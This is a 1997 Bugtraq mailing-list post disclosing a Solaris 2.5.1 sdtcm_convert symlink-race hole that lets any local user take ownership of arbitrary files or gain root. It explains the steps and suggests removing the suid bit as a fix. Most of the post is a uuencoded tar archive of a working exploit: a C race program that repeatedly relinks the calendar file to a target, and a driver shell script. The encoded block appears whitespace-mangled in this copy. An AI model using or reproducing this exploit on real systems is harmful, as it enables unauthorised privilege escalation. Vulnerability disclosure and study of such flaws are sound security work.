Bugtraq mailing list archives
Security hole in Solaris 2.5 (sdtcm_convert) + exploit
From: skipo () SUNDY CS PUB RO (Cristian SCHIPOR)
Date: Sat, 22 Feb 1997 17:07:23 +0200
Sat Feb 22 15:25:48 EET 1997 Romania Another hole in Solaris I have found a security hole in sdtcm_convert on Solaris 2.5.1. sdtcm_convert - calendar data conversion utility - allows any user to change the owner for any file (or directory) from the system or gain root access. The exploit is very simple. Change the permision mode of your calendar file (callog.YOU) from /var/spool/calendar directory (usual r--rw----) and run sdtcm_convert. sdtcm_convert 'll observe the change and 'll want to correct it (it 'll ask you first). You have only to delete the callog file and make a symbolic link to a target file and your calendar file and said to sdtcm_convert 'y' (yes). sdtcm_convert 'll make you the owner of target file ... A simple way to correct this is to get out suid_exec bit from sdtcm_convert I made an exploit, so you have to extract the text, uudecode it, and exec a 'tar -xf exploit.tar'. You'll get the files in exploit_dir. Cristian Schipor - Computer Science Faculty - Bucharest - Romania Email: skipo () math pub ro skipo () sundy cs pub ro skipo () ns ima ro Phone: (401) 410.60.88 begin 600 exploit.tar M97AP;&]I=%]D:7(O4D5!1$U% M M # Q,# V,# ,# P,#0V, P,# P-#4W # P,# P,# Q,#(Q M # V,S S-3<Q,3<W # P,30U-#( , M M !U<W1A<@ P,'-K:7!O M <W1U9#, M P,# P,#0P # P,# R,#< M M M M J2&]W('1O(&UA:V4@82!S:6UP;&4@8V%L;&]G M(&9I;&4J"@I)9B!Y;W4@9&]N="!H879E(&$@+W9A<B]S<&]O;"]C86QE;F1A M<B]C86QL;V<N64]5(&5D:70@8V%L;&]G+F5X86UP;&4L"G)E<&QA8V4@)W-K M:7!O)R!W:71H('EO=7(@=7-E<B!N86UE(&%N9" G<W5N9'DN8W,N<'5B+G)O M)R!W:71H('EO=7(*;6%C:&EN92!N86UE("AT<GD@9FER<W0@=&AE('-H;W)T M(&YA;64L(&5X86UP;&4Z('-U;F1Y(&%N9"!I9B!Y;W4G;&P@:&%V90IT<F]U M8FQE<VAO=&EN9W,@=')Y('1H92!L;VYG(&YA;64L(&5X86UP;&4@<W5N9'DN M8W,N<'5B+G)O*2X@069T97(@=&AA= IC;W!Y('1H92!N97<@8V%L;&]G(&9I M;&4@:6X@+W9A<B]S<&]O;"]C86QE;F1A<B]C86QL;V<N64]54E]54T527TY! M344L(')U;@IO;F-E('-D=&-M7V-O;G9E<G0@=VET:"!Y;W5R('5S97(@;F%M M92 H97AA;7!L92!S9'1C;5]C;VYV97)T('-K:7!O*0IA;F0@=V%I="!F;W(@ M8V]R<F5C=&EO;G,N($YO=R!Y;W4@87)E(')E861Y('1O(')U;B!T:&4@97AP M;&]I="X* M M M M M M M M M M M 97AP;&]I=%]D:7(O8V%L;&]G+F5X86UP;&4 M M # Q,# W,# ,# P,#0V, P,# P-#4W # P,# P M,# Q,S(P # V,S S-38W-#0T # P,38U,#4 , M M !U<W1A<@ P M,'-K:7!O <W1U9#, M P,# P,#0P # P,# R,#< M M M M !697)S:6]N.B T"BHJ*BH@<W1A<G0@ M;V8@;&]G(&]N($9R:2!$96,@(#8@,30Z,#<Z-#,@,3DY-B J*BHJ"@HH8V%L M96YD87)A='1R:6)U=&5S("@B+2\O6$%024$O0U-!+T-!3$%45%(O+TY/3E-' M34P@06-C97-S($QI<W0O+T5.(BPB,3 Z86-C97-S7VQI<W0B+")W;W)L9#HR M(BD**"(M+R]805!)02]#4T$O0T%,05144B\O3D].4T=-3"!#86QE;F1A<B!. M86UE+R]%3B(L(C4Z<W1R:6YG(BPB<VMI<&] <W5N9'DN8W,N<'5B+G)O(BD* M*"(M+R]805!)02]#4T$O0T%,05144B\O3D].4T=-3"!#86QE;F1A<B!/=VYE M<B\O14XB+"(V.G5S97(B+")S:VEP;T!S=6YD>2YC<RYP=6(N<F\B*0HH(BTO M+UA!4$E!+T-302]#04Q!5%12+R].3TY31TU,($-H87)A8W1E<B!3970O+T5. M(BPB-3IS=')I;F<B+")#+DE33RTX.#4Y+3$B*0HH(BTO+UA!4$E!+T-302]# M04Q!5%12+R].3TY31TU,($1A=&4@0W)E871E9"\O14XB+"(W.F1A=&5?=&EM M92(L(C$Y.38Q,C V5#$R,#<T,UHB*0HH(BTO+UA!4$E!+T-302]#04Q!5%12 M+R].3TY31TU,(%!R;V1U8W0@261E;G1I9FEE<B\O14XB+"(U.G-T<FEN9R(L M(BTO+T14+R].3TY31TU,($-A;&5N9&%R(%!R;V1U8W0@5F5R<VEO;B Q+R]% M3B(I"B@B+2\O6$%024$O0U-!+T-!3$%45%(O+TY/3E-'34P@5F5R<VEO;B\O M14XB+"(U.G-T<FEN9R(L(BTO+UA!4$E!+T-302]615)324].,2].3TY31TU, M($-302!697)S:6]N(#$O+T5.(BD**0H M M M M M M M 97AP;&]I=%]D:7(O;W)A;F=E+F, M M # Q,# V,# ,# P,#0V, P,# P-#4W M # P,# P,# Q,C0V # V,S S-38W,S(R # P,34S,#< , M M !U M<W1A<@ P,'-K:7!O <W1U9#, M P,# P,#0P # P,# R,#< M M M M C:6YC;'5D92 \<W1D:6\N M:#X*(VEN8VQU9&4@/'-Y<R]T>7!E<RYH/@HC:6YC;'5D92 \<WES+W-T870N M:#X*(VEN8VQU9&4@/'5N:7-T9"YH/@H*(V1E9FEN92!P871H(" B+W9A<B]S M<&]O;"]C86QE;F1A<B]C86QL;V<N(@H*"G9O:60@;6%I;BAI;G0@87)G8RP@ M8VAA<B J87)G=EM=*0I["FEN="!P:60L9FEL961E<ULR73L*1DE,12 J9CL* M<W1R=6-T('-T870@:6YF;SL*;&]N9R!I.PIC:&%R('1A<F=E=%LQ,CA=+'-H M:69T6S$R.%T["@D*"7-T<F-P>2AT87)G970L87)G=ELQ72D["@ES=')C<'DH M<VAI9G0L<&%T:"D["@ES=')C870H<VAI9G0L87)G=ELR72D["@EI9BAP:7!E M*&9I;&5D97,I*0H)>PH)"7!E<G)O<B@B8V%N="!C<F%T92!P:7!E7&XB*3L* M"0EE>&ET*# I.PH)?0D*"6EF*'!I9#UF;W)K*"D]/3 I"@E["@D)9F]R*&D] M,#MI/#,P,# P,# P.VDK*RD["@D)=6YL:6YK*'-H:69T*3L*"0ES>6UL:6YK M*'1A<F=E="QS:&EF="D["@D)=W)I=&4H9FEL961E<ULQ72PB>5QN(BQS:7IE M;V8H(GE<;B(I*3L*"7T)"0D)"@EE;'-E( H)>PH)"6-L;W-E*# I.PH)"61U M<"AF:6QE9&5S6S!=*3L*"0ES>7-T96TH(FQE;6]N(BD["@D)<W1A="AT87)G M970L)FEN9F\I.PH)"6EF*&EN9F\N<W1?=6ED/3UG971U:60H*2D@<')I;G1F M*")#3TQ,($D@9&ED($E4("$A(5QN(BD["@E]"@D*?0H M M M M M M M M 97AP;&]I=%]D:7(O=&AE9FER<W0 M M # Q,# W,# ,# P,#0V, P M,# P-#4W # P,# P,# P-S0W # V,S S-38W,S,R # P,34T-3( , M M M !U<W1A<@ P,'-K:7!O M<W1U9#, P,# P,#0P # P,# R M,#< M M M O8FEN+V5C:&\@ M(F]R86YG92YC("T^(&]R86YG92(*9V-C("UO(&]R86YG92!O<F%N9V4N8PH* M+W5S<B]U8V(O=VAO86UI(#X@=V@*<F5A9"!54T52(#P@+B]W: H*(W=A=&-H M:6YG(&9O<B!C86QL;V<@9FEL92!I9B!I="!I<VYT('=I;&P@<W1O< II9B A M('1E<W0@+68@+W9A<B]S<&]O;"]C86QE;F1A<B]C86QL;V<N)%5315([('1H M96X*(" O8FEN+V5C:&\@(DD@8V%N="!F;W5N9"!C86QL;V<@9FEL92X@4&QE M87-E(')E860@4D5!1$U%(&%N9"!C<F5A=&4@:70B"B @97AI=#L*9FD*"B]B M:6XO96-H;R B=VAA="=S('1H92!T87)G970@/S\_(@IR96%D(%1!4D=%5 H* M+V)I;B]E8VAO("]B:6XO8VAM;V0@,# P("]V87(O<W!O;VPO8V%L96YD87(O M8V%L;&]G+B154T52(#YL96UO;@HO8FEN+V5C:&\@+W5S<B]D="]B:6XO<V1T M8VU?8V]N=F5R=" D55-%4B ^/FQE;6]N"B]B:6XO8VAM;V0@-S P("XO;&5M M;VX*"BXO;W)A;F=E("1405)'150@)%5315(* M M M M M M M M M M M M M M M M M M M M M M I end
Current thread:
- Security hole in Solaris 2.5 (sdtcm_convert) + exploit Cristian SCHIPOR (Feb 22)
- Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit Casper Dik (Feb 22)
- <Possible follow-ups>
- Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit Adam Morrison (Feb 23)
- Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit Shumon Huque (Feb 23)
- Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit Brian Parent (Feb 24)
- CIAC Bulletin H-32: HP-UX ppl Core Dump Vulnerability Aleph One (Feb 24)
- IRIX 5.3 /var/rfindd/fsdump - exploit Chris Sheldon (Feb 25)
- Re: IRIX 5.3 /var/rfindd/fsdump - exploit Yuri Volobuev (Feb 25)
- Re[2]: [NTSEC] ! [ADVISORY] Major Security Hole in MS ASP daragh_malone () TELECOM IE (Feb 25)
- ** >= Ascend 5.0A SECURITY ALERT ** Kit Knox (Feb 26)
- Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit Shumon Huque (Feb 23)
- libX11 David Sacerdote (Feb 24)